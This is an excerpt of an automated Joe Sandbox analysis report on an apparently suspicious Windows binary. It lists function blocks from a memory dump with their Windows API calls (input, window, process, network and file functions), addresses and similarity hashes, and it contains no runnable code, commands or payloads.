                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3880355969-0
                                                                                                                  • Opcode ID: d69a223a689fc14b183ac2bdd261cc192639602b7f9a6dd598c31dd960f4d4ad
                                                                                                                  • Instruction ID: 1e36364d00d1afec84a16d0439050fd9f8bae2dfae20e5062aa8fa9a1d687241
                                                                                                                  • Opcode Fuzzy Hash: d69a223a689fc14b183ac2bdd261cc192639602b7f9a6dd598c31dd960f4d4ad
                                                                                                                  • Instruction Fuzzy Hash: D8514E71910209EFCF14DF68C880AAE7BA6FB45360F24915AF915DB391D770ED41CBA0
                                                                                                                  APIs
                                                                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00DAD258
                                                                                                                  • __itow.LIBCMT ref: 00DAD292
                                                                                                                    • Part of subcall function 00DAD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00DAD549
                                                                                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00DAD2FB
                                                                                                                  • __itow.LIBCMT ref: 00DAD350
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$__itow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3379773720-0
                                                                                                                  • Opcode ID: 85ca24476ed452a549629e8364699a365f0cdb07beeedd4827696b41c4aa840f
                                                                                                                  • Instruction ID: 08be4235fbdb11b96365225737697d47c95ca02433c003cf4d3d18189d43be69
                                                                                                                  • Opcode Fuzzy Hash: 85ca24476ed452a549629e8364699a365f0cdb07beeedd4827696b41c4aa840f
                                                                                                                  • Instruction Fuzzy Hash: 43419475A00309AFDF11DF54C842BEE7BBAEF4A710F044019FA06A7291DBB09A45CB76
                                                                                                                  APIs
                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DBEF32
                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00DBEF58
                                                                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DBEF7D
                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00DBEFA9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3321077145-0
                                                                                                                  • Opcode ID: 2043466306e43a9753d54a582e8ba8ef75599b25f6882ca14e8df6e5bb14147e
                                                                                                                  • Instruction ID: 1ce6a7a6d98a11fbf694937d2971c9b70ff8c16e22ed02f7aa86a5e837a7201f
                                                                                                                  • Opcode Fuzzy Hash: 2043466306e43a9753d54a582e8ba8ef75599b25f6882ca14e8df6e5bb14147e
                                                                                                                  • Instruction Fuzzy Hash: AB414D35600611DFCB10EF15C548A99BBE6EF89324B19C098E84AAF362DB70FD40DBB1
                                                                                                                  APIs
                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DDB3E1
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InvalidateRect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 634782764-0
                                                                                                                  • Opcode ID: f89f815862627f2f230bb2f2cc1c31eb9368d1a167e8e4a1a5b7a08350915db3
                                                                                                                  • Instruction ID: 39309d6adbd6828a7363fb56531056ad11e9767544194186da6313ff18f8679e
                                                                                                                  • Opcode Fuzzy Hash: f89f815862627f2f230bb2f2cc1c31eb9368d1a167e8e4a1a5b7a08350915db3
                                                                                                                  • Instruction Fuzzy Hash: 68317E34640208EFEB24DE59C899FAC3B65EB0537CF5A8517FA91D63A2C730D940AB71
                                                                                                                  APIs
                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00DDD617
                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00DDD68D
                                                                                                                  • PtInRect.USER32(?,?,00DDEB2C), ref: 00DDD69D
                                                                                                                  • MessageBeep.USER32(00000000), ref: 00DDD70E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1352109105-0
                                                                                                                  • Opcode ID: 53f36d8d73d5b6d6f0a6e12cd97912841579865905f19a0644dc98d3c099c5cf
                                                                                                                  • Instruction ID: 9c440c746a911e000548aedf7399b5eed0c7cd997adae03d30cfbad8e02632b1
                                                                                                                  • Opcode Fuzzy Hash: 53f36d8d73d5b6d6f0a6e12cd97912841579865905f19a0644dc98d3c099c5cf
                                                                                                                  • Instruction Fuzzy Hash: 9E416C30600218EFCF15CF59D884BA97BF6FB45300F1881AAE419DB351D730E845CBA0
                                                                                                                  APIs
                                                                                                                  • GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 00DB44EE
                                                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00DB450A
                                                                                                                  • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00DB456A
                                                                                                                  • SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 00DB45C8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 432972143-0
                                                                                                                  • Opcode ID: a15a5234792f33884510bbdf04a321a27e1c8e957de5214bb179a726e3507abd
                                                                                                                  • Instruction ID: c5c702feb1b611c5add524cf216919036560f7ddbe0cd594f120774254e99054
                                                                                                                  • Opcode Fuzzy Hash: a15a5234792f33884510bbdf04a321a27e1c8e957de5214bb179a726e3507abd
                                                                                                                  • Instruction Fuzzy Hash: D731E3B1904658EBEF34CB649808BFE7BE69B45310F08415AF083922C2CB74CA44D772
                                                                                                                  APIs
                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00DA4DE8
                                                                                                                  • __isleadbyte_l.LIBCMT ref: 00DA4E16
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00DA4E44
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00DA4E7A
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3058430110-0
                                                                                                                  • Opcode ID: c22c475f85e6b3b33c81775ac8aa62423e42ef988c3f00f96507f3040d0a2062
                                                                                                                  • Instruction ID: bfa3179dea296771f5e83c92a0dab788964ae78381cc0d53d11a01a2ae8b4aa5
                                                                                                                  • Opcode Fuzzy Hash: c22c475f85e6b3b33c81775ac8aa62423e42ef988c3f00f96507f3040d0a2062
                                                                                                                  • Instruction Fuzzy Hash: 8231A131600256AFDF219F74CC45BBA7BA6FF82310F198528F861871A1E7B0D951DBB0
                                                                                                                  APIs
                                                                                                                  • GetForegroundWindow.USER32 ref: 00DD7AB6
                                                                                                                    • Part of subcall function 00DB69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DB69E3
                                                                                                                    • Part of subcall function 00DB69C9: GetCurrentThreadId.KERNEL32 ref: 00DB69EA
                                                                                                                    • Part of subcall function 00DB69C9: AttachThreadInput.USER32(00000000,?,00DB8127), ref: 00DB69F1
                                                                                                                  • GetCaretPos.USER32(?), ref: 00DD7AC7
                                                                                                                  • ClientToScreen.USER32(00000000,?), ref: 00DD7B00
                                                                                                                  • GetForegroundWindow.USER32 ref: 00DD7B06
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2759813231-0
                                                                                                                  • Opcode ID: c4fcc9a5762f17fc974716ce28af60c243b37c58f2eda675dbfb4d5a91739cf5
                                                                                                                  • Instruction ID: b73480766a984a3bcf6a8d333e443b327b4eb9897feabebfc05ceb02ae61e758
                                                                                                                  • Opcode Fuzzy Hash: c4fcc9a5762f17fc974716ce28af60c243b37c58f2eda675dbfb4d5a91739cf5
                                                                                                                  • Instruction Fuzzy Hash: 8231ED71D00108AFCB00EFA5D8859EFBBF9EF58314B10806AE916E7211EA359E058BB0
                                                                                                                  APIs
                                                                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00DC49B7
                                                                                                                    • Part of subcall function 00DC4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DC4A60
                                                                                                                    • Part of subcall function 00DC4A41: InternetCloseHandle.WININET(00000000), ref: 00DC4AFD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Internet$CloseConnectHandleOpen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1463438336-0
                                                                                                                  • Opcode ID: c107ebc385c710802332cc42bd71d39fac8e605073d533414b885d117b071a35
                                                                                                                  • Instruction ID: 8ac46d2668ea0e21b2abbb378ba9cfd482a54fc924b6e3bc618314e89ed39a91
                                                                                                                  • Opcode Fuzzy Hash: c107ebc385c710802332cc42bd71d39fac8e605073d533414b885d117b071a35
                                                                                                                  • Instruction Fuzzy Hash: 24218331280606BBDB169F609C10F7BB7AAFB44715F14801EFA46D7650DB71E411AB74
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00DABCD9
                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00DABCE0
                                                                                                                  • CloseHandle.KERNEL32(00000004), ref: 00DABCFA
                                                                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00DABD29
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2621361867-0
                                                                                                                  • Opcode ID: 19f1f45a6d8cbd4d5305beea02ebafdd880f4cac069636f5d3839129a6acb798
                                                                                                                  • Instruction ID: 5153e3a6a46fbc963b46aa12b14285b04ecbf3076c230c6b0bffce8b0471c1d8
                                                                                                                  • Opcode Fuzzy Hash: 19f1f45a6d8cbd4d5305beea02ebafdd880f4cac069636f5d3839129a6acb798
                                                                                                                  • Instruction Fuzzy Hash: 2A214272101209ABDF019FA4DD49FEE7BAAEF46324F148015FA01A6161C776DD52DB70
                                                                                                                  APIs
                                                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00DD88A3
                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DD88BD
                                                                                                                  • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DD88CB
                                                                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00DD88D9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$Long$AttributesLayered
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2169480361-0
                                                                                                                  • Opcode ID: 52cd2f1edfac931e8de719320be10cd4c2452056a484d9db912b0ce60d395896
                                                                                                                  • Instruction ID: 71b9cb28c0d2dacaaf3cf3d8ec9d3310cd8871e2826d8405902abc0b4a9d013e
                                                                                                                  • Opcode Fuzzy Hash: 52cd2f1edfac931e8de719320be10cd4c2452056a484d9db912b0ce60d395896
                                                                                                                  • Instruction Fuzzy Hash: 2A118131245114AFDB15AB28DC05FBA7BAAEF85320F14811AF916D73E1DB70AD00EBB0
                                                                                                                  APIs
                                                                                                                  • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 00DC906D
                                                                                                                  • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 00DC907F
                                                                                                                  • accept.WS2_32(00000000,00000000,00000000), ref: 00DC908C
                                                                                                                  • WSAGetLastError.WS2_32(00000000), ref: 00DC90A3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastacceptselect
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 385091864-0
                                                                                                                  • Opcode ID: 976ed52c1696de7604d5fcd87121765ccf0251c1232a7f719299cde93a4e4950
                                                                                                                  • Instruction ID: 26d4f96c94c11c4d90278bd582adf07e22680a029be2ad915d5b91c4bc725477
                                                                                                                  • Opcode Fuzzy Hash: 976ed52c1696de7604d5fcd87121765ccf0251c1232a7f719299cde93a4e4950
                                                                                                                  • Instruction Fuzzy Hash: 632157715001149FC710DF69C855AAEBBFDEF49710F108169F84AD7290DB74D941CBB0
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00DB2CAA: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00DB18FD,?,?,?,00DB26BC,00000000,000000EF,00000119,?,?), ref: 00DB2CB9
                                                                                                                    • Part of subcall function 00DB2CAA: lstrcpyW.KERNEL32(00000000,?,?,00DB18FD,?,?,?,00DB26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00DB2CDF
                                                                                                                    • Part of subcall function 00DB2CAA: lstrcmpiW.KERNEL32(00000000,?,00DB18FD,?,?,?,00DB26BC,00000000,000000EF,00000119,?,?), ref: 00DB2D10
                                                                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00DB26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00DB1916
                                                                                                                  • lstrcpyW.KERNEL32(00000000,?,?,00DB26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00DB193C
                                                                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,00DB26BC,00000000,000000EF,00000119,?,?,00000000), ref: 00DB1970
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                                                                  • String ID: cdecl
                                                                                                                  • API String ID: 4031866154-3896280584
                                                                                                                  • Opcode ID: 5187bbd27314ea170f515d80d76f5d1dcf2b64b3eff3f20f4520dc814f715b59
                                                                                                                  • Instruction ID: 7485707e3a761f443105245a463633ecdee5ae6bc1790290e37b34373308915b
                                                                                                                  • Opcode Fuzzy Hash: 5187bbd27314ea170f515d80d76f5d1dcf2b64b3eff3f20f4520dc814f715b59
                                                                                                                  • Instruction Fuzzy Hash: B111AF3A100341EFDB15AF34D855ABA77A9FF45350B84802AE806CB254EB319951CBB0
                                                                                                                  APIs
                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00DB715C
                                                                                                                  • _memset.LIBCMT ref: 00DB717D
                                                                                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00DB71CF
                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00DB71D8
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000002.00000002.2483620952.0000000000D71000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                                                                  • Associated: 00000002.00000002.2483577699.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E1E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E2A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000E44000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2483620952.0000000000ECC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485343837.0000000000ED2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  • Associated: 00000002.00000002.2485617582.0000000000ED3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_2_2_d70000_UNK_.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1157408455-0
